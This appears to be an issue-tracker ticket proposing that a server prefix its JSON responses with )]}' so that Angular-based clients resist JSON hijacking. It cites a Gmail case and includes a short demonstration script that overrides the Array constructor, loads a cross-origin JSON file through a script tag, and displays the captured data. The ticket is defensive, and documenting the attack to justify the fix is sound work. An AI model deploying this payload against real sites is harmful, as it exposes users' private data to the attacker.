-
Improvement
-
Resolution: Unresolved
-
Minor
-
None
-
None
As described here, the JavaScript "Array" contructor can be overridden by the user.
If malicious sites utilize our API, this allows the user to easily get their hands on array data that the server passes back to the client, such as specs, stacks, or volumes. Since "stacks" can contain password information regarding services, this seems like a security hole. (although, since the browser's Developer console can show you this, perhaps it is a moot point)
To counter this your server can prefix all JSON requests with following string
)]}',\n
|
Angular will automatically strip the prefix before processing it as JSON.
Real world example (gmail): http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html
Toy example:
|
Demonstration |
<!-- Override the default JavaScript constructor for Arrays -->
|
<script type="text/javascript"> |
var secrets;
|
|
|
Array = function() {
|
secrets = this;
|
};
|
</script> |
|
|
<!-- This returns an array, which is stored in the varibale named "secrets" -->
|
<script src="http://haacked.com/demos/secret-info.json" type="text/javascript"> |
|
|
<!-- Parse out secret data and print it to the screen -->
|
<script type="text/javascript"> |
var yourData = '';
|
var i = -1;
|
while(secrets[++i]) {
|
yourData += secrets[i] + ' ';
|
}
|
|
|
alert('I stole your data: ' + yourData);
|
</script> |
